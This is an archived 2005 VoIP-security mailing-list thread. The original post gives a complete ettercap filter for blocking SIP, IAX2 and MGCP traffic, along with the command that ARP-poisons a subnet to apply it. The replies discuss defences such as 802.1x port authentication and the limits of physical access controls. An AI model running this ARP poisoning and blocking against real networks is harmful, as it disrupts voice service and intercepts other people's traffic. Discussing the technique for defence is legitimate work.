[VOIPSEC] VoIP Blocking Filter w/Ettercap

stuart jacobs stu.jacobs at verizon.com
Wed Jul 13 13:19:06 CDT 2005 

I need to chime in regarding Jim's last statement about the "carrier  
environment where there are strong physical access controls".  The  
reality is that carrier facilities cannot be assumed to have strong  
physical access controls.  As a result of "Cageless Co-Location"  
regulations many carrier facilities are required to allow non-carrier  
personnel access.  Furthermore one cannot ignore the potential for  
insider malicious activities either.

Stu Jacobs

On Jul 13, 2005, at 10:31 AM, Credland, Jim wrote:

> Protecting a network to which people have physical access is tricky.
> Ettercap is a scary reminder of how easy it is to intercept/reroute and
> generally ethernet segments.  If you've got a test network to try a  
> man in
> the middle attack on using ettercap it's well worth it for the  
> amusement
> value alone.
>
> In an enterprise environment requiring a high standard of VoIP  
> security I'd
> definitely be considering something like 802.1x port authentication to
> reduce the risk from someone connecting a PC to the VoIP vLAN, and if  
> it was
> readily available encryption of the voice and switching traffic.
>
> Much of the documentation on VoIP Security seems to skip over these  
> kinds of
> problems, the NIST documents solution is use encryption,  
> authentication and
> public keys.  This does little about denial-of-service and has the  
> lack of
> support for these kinds of features in many implementations.   The  
> Cisco
> VoIP security document used to suggests you don't let anyone bad near  
> your
> switch - but I've noticed a new document on their site listing a whole  
> load
> of layer 2 security features - see
> http://www.cisco.com/en/US/netsol/ns340/ns394/ns165/ 
> networking_solutions_whi
> te_paper0900aecd80240249.shtml - in the layer 2 defenses section.  I'd  
> be
> interested - if you test switch has these features - in whether or not  
> you
> can cause much distruption with these features enabled.
>
> I think I saw a tool for listening to intercepted RTP streams but I  
> forget
> what it's called?
>
> Luckly once you get out of your LAN environment to a central server or
> carrier environment where there are strong physical access controls  
> then
> this kind of security becomes less critical and other problems raise  
> their
> heads instead.
>
> jim.credland at thus.net
> Security Consultant
>
>
>> -----Original Message-----
>> From: Natas [mailto:natas05 at gmail.com]
>> Sent: 13 July 2005 02:09
>> To: Voipsec at voipsa.org
>> Subject: [VOIPSEC] VoIP Blocking Filter w/Ettercap
>>
>> After playing around with ettercap and its filter program,
>> etterfilter, I realized how easy it would be to ARP poison a
>> network and block all VoIP packets from passing through.
>> While packet manipulation obviously isn't new, and the root
>> of the problem comes from the ease of ARP poisoning, I was
>> still kind of shocked at how easy an attack like this could
>> be pulled off in a real world scenario.
>> A simple ettercap filter can be used to block all SIP, IAX2
>> and MGCP traffic, stopping any possible communication across
>> a network segment, but letting other traffic properly pass
>> through. Below is a basic filter I wrote up for this list.
>>
>>
>> # blockvoip.filter
>> # Proof of concept VoIP blocking filter
>> # By Natas
>> # Instructions:
>> # Run "etterfilter blockvoip.filter -o blockvoip.ef"
>> # Then "ettercap -T -q -F blockvoip.ef -M ARP /10.1.1.1-254/ //"
>>
>> if (ip.proto == UDP && udp.src == 4569) {
>>     msg("Killed Attempted IAX2 Connection.\n");
>>     drop();
>>     kill();
>> }
>>
>> if (ip.proto == UDP && udp.src == 5060) {
>>     msg("Killed Attempted SIP Connection.\n");
>>     drop();
>>     kill();
>> }
>>
>> if (ip.proto == UDP && udp.src == 2427) {
>>     msg("Killed Attempted MGCP Connection.\n");
>>     drop();
>>     kill();
>> }
>>
>> # Don't know to much about MGCP Call Agent traffic but # I
>> put it in here for the hell of it.
>> if (ip.proto == UDP && udp.src == 2727) {
>>     msg("Killed Attempted MGCP Call Agent Connection.\n");
>>     drop();
>>     kill();
>> }
>>
>> # End.
>>
>> Obviously this is just a simple example and could easily be
>> expanded to ensure that no VoIP traffic whatsoever passes through.
>>
>> I'm not sure how everyone here will feel about this little
>> example but I wanted to put it out there for everyone to see.
>> I have some other VoIP packet manipulation ideas that I am
>> playing around with.
>>
>> I enjoy the VoIPSA mailing list very much and like reading
>> every ones posts and concerns. If you would like to talk off
>> the list, feel free to email me or contact me at 206-338-3337.
>>
>> Natas
>>
>> _______________________________________________
>> Voipsec mailing list
>> Voipsec at voipsa.org
>> http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
>>
>
> _______________________________________________
> Voipsec mailing list
> Voipsec at voipsa.org
> http://voipsa.org/mailman/listinfo/voipsec_voipsa.org
>
>
Stuart Jacobs, CISM, CISSP
PMTS - Sr. Technologist
Network Security
Verizon Laboratories
40 Sylvan Road
Waltham MA 02451-1128
(781) 466-3076

More information about the Voipsec mailing list